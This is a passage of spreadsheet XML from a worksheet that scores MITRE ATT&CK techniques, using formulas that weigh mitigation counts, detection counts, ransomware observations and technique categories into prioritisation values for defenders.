        <f>IF(AL123="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN123" s="52">
        <v>0</v>
      </c>
      <c r="AO123" s="51">
        <v>0</v>
      </c>
      <c r="AP123" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7133333333333323E-2</v>
      </c>
      <c r="AQ123" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.22377777777777777</v>
      </c>
      <c r="AR123" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.22377777777777777</v>
      </c>
      <c r="AS123" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT123" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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24" spans="1:47">
      <c r="A124" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9933333333333351E-2</v>
      </c>
      <c r="B124" s="25">
        <f>SUM(H124,M124,V124)*(1+SUM(AE124,AG124,AI124,AK124,AM124))</f>
        <v>0.56600000000000017</v>
      </c>
      <c r="C124" s="25" t="s">
        <v>580</v>
      </c>
      <c r="D124" s="25" t="s">
        <v>502</v>
      </c>
      <c r="E124" s="25" t="s">
        <v>581</v>
      </c>
      <c r="F124" s="51">
        <v>1</v>
      </c>
      <c r="G124" s="51">
        <v>1</v>
      </c>
      <c r="H124" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I124">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J124">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K124">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L124">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M124" s="25">
        <v>0</v>
      </c>
      <c r="N124" s="51">
        <v>0</v>
      </c>
      <c r="O124" s="51">
        <v>2</v>
      </c>
      <c r="P124" s="51">
        <v>0</v>
      </c>
      <c r="Q124" s="51">
        <v>0</v>
      </c>
      <c r="R124" s="52" t="s">
        <v>582</v>
      </c>
      <c r="S124" s="51">
        <v>23</v>
      </c>
      <c r="T124" s="52" t="s">
        <v>583</v>
      </c>
      <c r="U124" s="51">
        <v>18</v>
      </c>
      <c r="V124" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.40000000000000008</v>
      </c>
      <c r="W124">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>41</v>
      </c>
      <c r="X124">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.74545454545454548</v>
      </c>
      <c r="Y124">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.74545454545454548</v>
      </c>
      <c r="Z124">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA124">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB124">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC124" s="29" t="s">
        <v>584</v>
      </c>
      <c r="AD124" s="25" t="str" cm="1">
        <f t="array" ref="AD124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE124" s="25">
        <f>IF(AD124="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF124" s="25" t="str" cm="1">
        <f t="array" ref="AF124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG124" s="25">
        <f>IF(AF124="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH124" s="25" t="str" cm="1">
        <f t="array" ref="AH124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC124)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI124" s="25">
        <f>IF(AH124="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ124" s="25" t="str" cm="1">
        <f t="array" ref="AJ124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK124" s="25">
        <f>IF(AJ124="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL124" s="25" t="str" cm="1">
        <f t="array" ref="AL124">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC124)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM124" s="25">
        <f>IF(AL124="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN124" s="60">
        <v>1</v>
      </c>
      <c r="AO124" s="51">
        <v>1</v>
      </c>
      <c r="AP124" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9933333333333351E-2</v>
      </c>
      <c r="AQ124" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18866666666666673</v>
      </c>
      <c r="AR124" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18866666666666673</v>
      </c>
      <c r="AS124" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT124" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU12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25" spans="1:47" ht="48">
      <c r="A125" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.29983333333333334</v>
      </c>
      <c r="B125" s="25">
        <f>SUM(H125,M125,V125)*(1+SUM(AE125,AG125,AI125,AK125,AM125))</f>
        <v>0.66500000000000004</v>
      </c>
      <c r="C125" s="25" t="s">
        <v>585</v>
      </c>
      <c r="D125" s="25" t="s">
        <v>292</v>
      </c>
      <c r="E125" s="25" t="s">
        <v>586</v>
      </c>
      <c r="F125" s="51">
        <v>1</v>
      </c>
      <c r="G125" s="51">
        <v>1</v>
      </c>
      <c r="H125" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I125">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J125">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K125">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L125">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M125" s="25">
        <v>0</v>
      </c>
      <c r="N125" s="51">
        <v>0</v>
      </c>
      <c r="O125" s="51">
        <v>10</v>
      </c>
      <c r="P125" s="51">
        <v>10</v>
      </c>
      <c r="Q125" s="51">
        <v>22</v>
      </c>
      <c r="R125" s="52" t="s">
        <v>293</v>
      </c>
      <c r="S125" s="51">
        <v>9</v>
      </c>
      <c r="T125" s="52" t="s">
        <v>294</v>
      </c>
      <c r="U125" s="51">
        <v>12</v>
      </c>
      <c r="V125" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="W125">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X125">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y125">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z125">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>42</v>
      </c>
      <c r="AA125">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.42</v>
      </c>
      <c r="AB125">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.42</v>
      </c>
      <c r="AC125" s="29" t="s">
        <v>587</v>
      </c>
      <c r="AD125" s="25" t="str" cm="1">
        <f t="array" ref="AD125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC125)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE125" s="25">
        <f>IF(AD125="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF125" s="25" t="str" cm="1">
        <f t="array" ref="AF125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC125)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG125" s="25">
        <f>IF(AF125="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH125" s="25" t="str" cm="1">
        <f t="array" ref="AH125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC125)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI125" s="25">
        <f>IF(AH125="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ125" s="25" t="str" cm="1">
        <f t="array" ref="AJ125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC125)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK125" s="25">
        <f>IF(AJ125="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL125" s="25" t="str" cm="1">
        <f t="array" ref="AL125">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC125)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM125" s="25">
        <f>IF(AL125="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN125" s="60">
        <v>7</v>
      </c>
      <c r="AO125" s="51">
        <v>1</v>
      </c>
      <c r="AP125" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.29983333333333334</v>
      </c>
      <c r="AQ125" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.22166666666666668</v>
      </c>
      <c r="AR125" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.22166666666666668</v>
      </c>
      <c r="AS125" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT125" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU12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26" spans="1:47" ht="32.1">
      <c r="A126" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.9833333333333329E-2</v>
      </c>
      <c r="B126" s="25">
        <f>SUM(H126,M126,V126)*(1+SUM(AE126,AG126,AI126,AK126,AM126))</f>
        <v>0.66500000000000004</v>
      </c>
      <c r="C126" s="25" t="s">
        <v>588</v>
      </c>
      <c r="D126" s="25" t="s">
        <v>589</v>
      </c>
      <c r="E126" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F126" s="51">
        <v>1</v>
      </c>
      <c r="G126" s="51">
        <v>1</v>
      </c>
      <c r="H126" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I126">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J126">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K126">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L126">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M126" s="25">
        <v>0</v>
      </c>
      <c r="N126" s="51">
        <v>0</v>
      </c>
      <c r="O126" s="51">
        <v>2</v>
      </c>
      <c r="P126" s="51">
        <v>4</v>
      </c>
      <c r="Q126" s="51">
        <v>0</v>
      </c>
      <c r="R126" s="52" t="s">
        <v>590</v>
      </c>
      <c r="S126" s="51">
        <v>21</v>
      </c>
      <c r="T126" s="51" t="s">
        <v>591</v>
      </c>
      <c r="U126" s="51">
        <v>18</v>
      </c>
      <c r="V126" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="W126">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>39</v>
      </c>
      <c r="X126">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Y126">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Z126">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA126">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB126">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC126" s="29" t="s">
        <v>416</v>
      </c>
      <c r="AD126" s="25" t="str" cm="1">
        <f t="array" ref="AD126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC126)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE126" s="25">
        <f>IF(AD126="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF126" s="25" t="str" cm="1">
        <f t="array" ref="AF126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC126)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG126" s="25">
        <f>IF(AF126="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH126" s="25" t="str" cm="1">
        <f t="array" ref="AH126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC126)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI126" s="25">
        <f>IF(AH126="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ126" s="25" t="str" cm="1">
        <f t="array" ref="AJ126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC126)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK126" s="25">
        <f>IF(AJ126="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL126" s="25" t="str" cm="1">
        <f t="array" ref="AL126">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC126)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM126" s="25">
        <f>IF(AL126="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN126" s="60">
        <v>1</v>
      </c>
      <c r="AO126" s="51">
        <v>1</v>
      </c>
      <c r="AP126" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.9833333333333329E-2</v>
      </c>
      <c r="AQ126" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.22166666666666668</v>
      </c>
      <c r="AR126" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.22166666666666668</v>
      </c>
      <c r="AS126" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT126" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU12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27" spans="1:47" ht="32.1">
      <c r="A127" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6500000000000004E-2</v>
      </c>
      <c r="B127" s="25">
        <f>SUM(H127,M127,V127)*(1+SUM(AE127,AG127,AI127,AK127,AM127))</f>
        <v>0.66500000000000004</v>
      </c>
      <c r="C127" s="25" t="s">
        <v>592</v>
      </c>
      <c r="D127" s="25" t="s">
        <v>435</v>
      </c>
      <c r="E127" s="25" t="s">
        <v>593</v>
      </c>
      <c r="F127" s="51">
        <v>1</v>
      </c>
      <c r="G127" s="51">
        <v>1</v>
      </c>
      <c r="H127" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I127">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J127">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K127">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L127">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M127" s="25">
        <v>0</v>
      </c>
      <c r="N127" s="51">
        <v>0</v>
      </c>
      <c r="O127" s="51">
        <v>11</v>
      </c>
      <c r="P127" s="51">
        <v>0</v>
      </c>
      <c r="Q127" s="51">
        <v>5</v>
      </c>
      <c r="R127" s="52" t="s">
        <v>436</v>
      </c>
      <c r="S127" s="51">
        <v>10</v>
      </c>
      <c r="T127" s="51" t="s">
        <v>594</v>
      </c>
      <c r="U127" s="51">
        <v>24</v>
      </c>
      <c r="V127" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="W127">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>34</v>
      </c>
      <c r="X127">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.61818181818181817</v>
      </c>
      <c r="Y127">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.61818181818181817</v>
      </c>
      <c r="Z127">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>16</v>
      </c>
      <c r="AA127">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.16</v>
      </c>
      <c r="AB127">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.16</v>
      </c>
      <c r="AC127" s="29" t="s">
        <v>595</v>
      </c>
      <c r="AD127" s="25" t="str" cm="1">
        <f t="array" ref="AD127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC127)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE127" s="25">
        <f>IF(AD127="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF127" s="25" t="str" cm="1">
        <f t="array" ref="AF127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC127)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG127" s="25">
        <f>IF(AF127="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH127" s="25" t="str" cm="1">
        <f t="array" ref="AH127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC127)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI127" s="25">
        <f>IF(AH127="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ127" s="25" t="str" cm="1">
        <f t="array" ref="AJ127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC127)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK127" s="25">
        <f>IF(AJ127="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL127" s="25" t="str" cm="1">
        <f t="array" ref="AL127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC127)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM127" s="25">
        <f>IF(AL127="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN127" s="58">
        <v>0</v>
      </c>
      <c r="AO127" s="51">
        <v>0</v>
      </c>
      <c r="AP127" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6500000000000004E-2</v>
      </c>
      <c r="AQ127" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.22166666666666668</v>
      </c>
      <c r="AR127" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.22166666666666668</v>
      </c>
      <c r="AS127" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT127" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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28" spans="1:47" ht="32.1">
      <c r="A128" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9800000000000001E-2</v>
      </c>
      <c r="B128" s="25">
        <f>SUM(H128,M128,V128)*(1+SUM(AE128,AG128,AI128,AK128,AM128))</f>
        <v>0.69799999999999995</v>
      </c>
      <c r="C128" s="25" t="s">
        <v>596</v>
      </c>
      <c r="D128" s="25" t="s">
        <v>597</v>
      </c>
      <c r="E128" s="25" t="s">
        <v>598</v>
      </c>
      <c r="F128" s="51">
        <v>1</v>
      </c>
      <c r="G128" s="51">
        <v>1</v>
      </c>
      <c r="H128" s="25">
